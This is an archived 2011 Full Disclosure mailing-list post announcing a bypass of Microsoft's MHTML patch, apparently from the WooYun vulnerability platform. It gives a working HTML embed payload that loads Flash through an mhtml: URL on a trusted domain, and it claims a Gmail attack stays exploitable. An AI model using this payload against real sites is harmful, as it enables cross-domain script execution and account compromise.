Full Disclosure mailing list archives
MS mhtml patch bypass
From: sec yun <root () wooyun org>
Date: Tue, 19 Apr 2011 13:40:34 +0800
Hi someone report a case about bypass mhtml patch http://www.wooyun.org/bugs/wooyun-2010-01929 <embed type="application/x-shockwave-flash" src="mhtml: http://trusteddomain.com/wooyun.jpg!wooyun.swf" allowNetworking=all AllowScriptAccess=samedomain width=500 height=500></embed> some VUL like http://www.wooyun.org/bugs/wooyun-2010-01474 (gmail hack) will stiil be exploitable credits: http://www.wooyun.org/whitehats/latentwind :)
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- MS mhtml patch bypass sec yun (Apr 19)